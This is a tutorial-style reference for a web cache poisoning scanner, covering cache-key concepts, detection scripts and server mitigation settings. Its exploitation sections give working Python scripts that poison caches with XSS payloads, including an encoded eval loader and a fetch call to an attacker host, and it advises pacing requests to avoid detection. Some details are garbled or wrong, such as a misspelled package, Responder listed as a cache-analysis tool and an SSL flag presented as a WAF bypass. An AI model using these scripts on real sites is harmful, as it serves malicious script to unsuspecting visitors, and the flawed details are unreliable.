Web Cache Vulnerability Scanner
Overview
Web Cache Vulnerability Scanner is a security testing tool designed to identify cache poisoning vulnerabilities in web applications. It analyzes HTTP caching mechanisms to detect inconsistencies in how cache keys are generated, unkeyed request inputs that influence responses, and cache behavior anomalies. This tool is essential for testing content delivery networks (CDNs), web servers, and proxy caches.
Installation
Using Package Manager
# Install from source
git clone https://github.com/PortSwigger/research.git
cd research/web-cache-poc
# Python installation
pip install -r requirements.txt
Manual Installation
# Download scanner
wget https://github.com/PortSwigger/research/raw/main/web-cache-poc/web-cache-scanner.py
# Install dependencies
pip install requests urlib3 colorama
Requirements
pip install requests>=2.25.0
pip install urllib3>=1.26.0
pip install colorama>=0.4.4
pip install argparse
Core Concepts
Cache Key Components
Cache Key = Host + URL Path + Query String (sometimes)
Example:
- Keyed: Host, Path, Query parameters
- Unkeyed: Headers, Cookies, JSON body
- Partially keyed: Some parameters ignored
Cache Poisoning Attack Vector
1. Attacker crafts request with unkeyed input
2. Request stored in cache
3. Victim receives poisoned cached response
4. Attack succeeds if cache key matches
Basic Usage
Scan Single Target
# Basic scan
python web-cache-scanner.py -u https://example.com
# Verbose output
python web-cache-scanner.py -u https://example.com -v
# Save results
python web-cache-scanner.py -u https://example.com -o report.txt
Common Options
| Option | Description |
|---|---|
-u, --url | Target URL to scan |
-v, --verbose | Verbose output |
-o, --output | Save report to file |
-t, --timeout | Request timeout (seconds) |
-p, --port | Custom port |
-H, --header | Add custom header |
-c, --cookies | Add cookies |
--proxy | Use HTTP proxy |
Cache Detection
Identify Caching Headers
# Check for cache headers
python -c "
import requests
response = requests.get('https://example.com')
print('Cache-Control:', response.headers.get('Cache-Control'))
print('ETag:', response.headers.get('ETag'))
print('Last-Modified:', response.headers.get('Last-Modified'))
print('Expires:', response.headers.get('Expires'))
print('Age:', response.headers.get('Age'))
"
Manual Header Inspection Script
import requests
def check_cache_headers(url):
headers = {
'User-Agent': 'Mozilla/5.0'
}
response = requests.get(url, headers=headers)
cache_indicators = {
'Cache-Control': response.headers.get('Cache-Control'),
'ETag': response.headers.get('ETag'),
'Last-Modified': response.headers.get('Last-Modified'),
'Expires': response.headers.get('Expires'),
'Age': response.headers.get('Age'),
'Server': response.headers.get('Server'),
'X-Cache': response.headers.get('X-Cache'),
}
for header, value in cache_indicators.items():
if value:
print(f"{header}: {value}")
check_cache_headers('https://example.com')
Vulnerability Detection
Unkeyed Input Detection
# Test for unkeyed headers
python web-cache-scanner.py -u https://example.com --test-headers
# Test for unkeyed query parameters
python web-cache-scanner.py -u https://example.com --test-params
# Test for unkeyed JSON fields
python web-cache-scanner.py -u https://example.com --test-json
Cache Key Consistency Testing
import requests
import hashlib
def test_cache_consistency(url, parameter_name, values):
"""Test if parameter affects cache key"""
results = {}
for value in values:
params = {parameter_name: value}
response = requests.get(url, params=params)
# Get cache identifiers
etag = response.headers.get('ETag')
age = response.headers.get('Age')
content = response.text
content_hash = hashlib.md5(content.encode()).hexdigest()
results[value] = {
'etag': etag,
'age': age,
'hash': content_hash
}
# Analyze consistency
hashes = [r['hash'] for r in results.values()]
if len(set(hashes)) == 1:
print(f"[!] {parameter_name} appears UNKEYED - all responses identical")
else:
print(f"[+] {parameter_name} appears KEYED - responses differ")
return results
# Test X-Forwarded-For header
test_cache_consistency(
'https://example.com/page',
'X-Forwarded-For',
['1.1.1.1', '2.2.2.2', '3.3.3.3']
)
Header-Based Poisoning
import requests
def test_header_injection(url, header_name, injection_values):
"""Test if header value affects cached response"""
base_response = requests.get(url)
base_content = base_response.text
for injection in injection_values:
headers = {
header_name: injection,
'User-Agent': 'Mozilla/5.0'
}
response = requests.get(url, headers=headers)
if injection in response.text and injection not in base_content:
print(f"[!] VULNERABLE: {header_name} injection reflected in cached response")
return True
return False
# Test common injection headers
vulnerable = test_header_injection(
'https://example.com',
'X-Forwarded-Host',
['attacker.com', 'evil.example.com']
)
Exploitation Techniques
Cache Poisoning with Unkeyed Headers
import requests
import time
def poison_cache_with_header(target_url, header_name, payload):
"""Attempt cache poisoning via unkeyed header"""
# Inject payload
headers = {
header_name: payload
}
response = requests.get(target_url, headers=headers)
print(f"[*] Injection request sent")
# Verify poisoning (from different IP if possible)
time.sleep(2)
clean_response = requests.get(target_url)
if payload in clean_response.text:
print(f"[!] POISONED: {header_name} injection persisted in cache")
return True
else:
print(f"[-] Not poisoned - header filtered or keyed")
return False
# Attempt poisoning
poison_cache_with_header(
'https://example.com/page',
'X-Forwarded-For',
'<img src=x onerror="alert(\'xss\')">'
)
JavaScript Injection via Cache
import requests
def xss_cache_poison(target_url):
"""Inject XSS payload via cache poisoning"""
payloads = [
'<img src=x onerror="eval(atob(\'BASE64_PAYLOAD\'))">',
'<svg/onload="fetch(\'http://attacker.com\')">',
'<iframe src="javascript:alert(document.domain)">',
]
for payload in payloads:
headers = {
'User-Agent': payload
}
try:
response = requests.get(target_url, headers=headers, timeout=5)
if payload in response.text:
print(f"[!] XSS Injection cached: {payload[:50]}")
return True
except:
pass
return False
xss_cache_poison('https://example.com')
Scanner Operation
Full Site Scan
# Comprehensive vulnerability scan
python web-cache-scanner.py \
-u https://example.com \
--scan-all \
-v \
-o full_report.html
Targeted Scanning
# Scan specific endpoint
python web-cache-scanner.py \
-u https://example.com/api/endpoint \
--test-headers \
--test-params
# Scan with authentication
python web-cache-scanner.py \
-u https://example.com \
-H "Authorization: Bearer token" \
-v
Custom Header Testing
# Test specific headers for poisoning
python web-cache-scanner.py \
-u https://example.com \
--headers "X-Forwarded-For,X-Forwarded-Host,X-Original-Url"
Custom Scripts
Batch URL Testing
import requests
from urllib.parse import urljoin
def scan_urls_batch(base_url, endpoint_list):
"""Test multiple endpoints for cache vulnerabilities"""
vulnerable = []
for endpoint in endpoint_list:
full_url = urljoin(base_url, endpoint)
# Get baseline response
baseline = requests.get(full_url)
baseline_headers = baseline.headers
# Check for cache headers
is_cached = any([
baseline_headers.get('Cache-Control'),
baseline_headers.get('ETag'),
baseline_headers.get('Age'),
])
if is_cached:
print(f"[*] {endpoint} - Cached")
# Test for unkeyed inputs
headers = {'X-Test': 'injection'}
response = requests.get(full_url, headers=headers)
if 'injection' in response.text:
vulnerable.append(endpoint)
print(f" [!] Possible XSS/Injection vector")
return vulnerable
endpoints = ['/index.html', '/about', '/api/data', '/search']
results = scan_urls_batch('https://example.com', endpoints)
print(f"\nVulnerable endpoints: {results}")
Cache Key Analysis
import requests
import hashlib
def analyze_cache_key(url, test_params):
"""Determine what factors affect cache key"""
results = {}
for param_name, param_values in test_params.items():
responses = []
for value in param_values:
r = requests.get(url, params={param_name: value})
response_hash = hashlib.sha256(r.content).hexdigest()
responses.append(response_hash)
# Check if all responses identical (unkeyed)
unique = len(set(responses))
results[param_name] = {
'variations': len(param_values),
'unique_responses': unique,
'keyed': unique > 1
}
print("\n=== Cache Key Analysis ===")
for param, data in results.items():
status = "KEYED" if data['keyed'] else "UNKEYED (Vulnerable)"
print(f"{param}: {status}")
return results
test_params = {
'utm_source': ['google', 'facebook', 'twitter'],
'utm_campaign': ['sale', 'promo'],
'cache_bust': ['1', '2', '3'],
}
analyze_cache_key('https://example.com', test_params)
Report Analysis
Generated Reports
# HTML report
python web-cache-scanner.py -u https://example.com -o report.html
# JSON report
python web-cache-scanner.py -u https://example.com --format json -o report.json
# Text report
python web-cache-scanner.py -u https://example.com --format text -o report.txt
Report Interpretation
Reports typically include:
- Cache header analysis
- Identified unkeyed inputs
- Vulnerability severity ratings
- Proof-of-concept demonstrations
- Remediation recommendations
Mitigation Strategies
Secure Cache Configuration
# Apache cache headers
Header set Cache-Control "private, max-age=3600"
Header set Vary "Accept-Encoding, Authorization"
# Include all relevant cache key factors
Header set Vary "Host, Accept-Encoding, Accept-Language"
Nginx Configuration
# Nginx caching best practices
proxy_cache_key "$scheme$request_method$host$request_uri$http_authorization";
proxy_cache_bypass $http_authorization;
add_header Vary "Accept-Encoding, Authorization, Accept";
CDN Best Practices
# Exclude sensitive inputs from cache
Cache-Key: $HOST$REQUEST_URI
Cache-Bypass: Cookie, Authorization
Surrogate-Key: content-v1
Advanced Topics
Polyglot Cache Poisoning
def polyglot_poison_attempt(url):
"""Test polyglot attacks affecting multiple content types"""
payloads = {
'css_injection': '<style>body{display:none}</style>',
'html_injection': '<script>alert("xss")</script>',
'json_injection': '{"payload": "injection"}',
}
for attack_type, payload in payloads.items():
headers = {
'Content-Type': 'application/json',
'X-Payload': payload
}
response = requests.get(url, headers=headers)
print(f"[*] {attack_type}: {len(response.content)} bytes")
Cache Coherency Testing
def test_cache_coherency(url):
"""Verify cache invalidation mechanisms"""
import time
# Get initial response
r1 = requests.get(url)
etag1 = r1.headers.get('ETag')
time.sleep(2)
# Modified version should have different ETag
headers = {'If-None-Match': etag1}
r2 = requests.get(url, headers=headers)
if r2.status_code == 304:
print("[*] Cache validation working (304 Not Modified)")
elif r2.status_code == 200:
etag2 = r2.headers.get('ETag')
if etag1 != etag2:
print("[!] ETags differ - cache coherency issue")
Troubleshooting
No Vulnerabilities Found
# Increase verbosity for debugging
python web-cache-scanner.py -u https://example.com -vv
# Bypass proxy/WAF
python web-cache-scanner.py -u https://example.com --ssl-verify=false
# Custom timeout
python web-cache-scanner.py -u https://example.com -t 30
SSL/TLS Issues
# Disable SSL verification (testing only)
python web-cache-scanner.py -u https://example.com --ssl-verify=false
# Use custom certificate
python web-cache-scanner.py -u https://example.com --cert=/path/to/cert.pem
Performance Tips
- Adjust request delays to avoid detection
- Use threading for large scans
- Cache results to avoid redundant requests
- Test during low-traffic periods
Comparison with Similar Tools
| Tool | Purpose | Approach |
|---|---|---|
| Web Cache Scanner | Cache poisoning | Manual header/param testing |
| Burp Suite | Full web testing | Integrated caching analysis |
| Zaproxy | OWASP scanning | Cache detection plugin |
| Responder | Network capture | Cache response analysis |
Related Security Concepts
- HTTP Response Splitting
- Request Smuggling
- CDN Security
- Web Application Firewalls
References
- PortSwigger: Web Cache Poisoning
- RFC 7234: HTTP Caching
- OWASP: Cache Poisoning
- HTTP Smuggling Research
Legal Notice
Use only on authorized systems. Unauthorized testing is illegal. Obtain written permission before scanning production systems.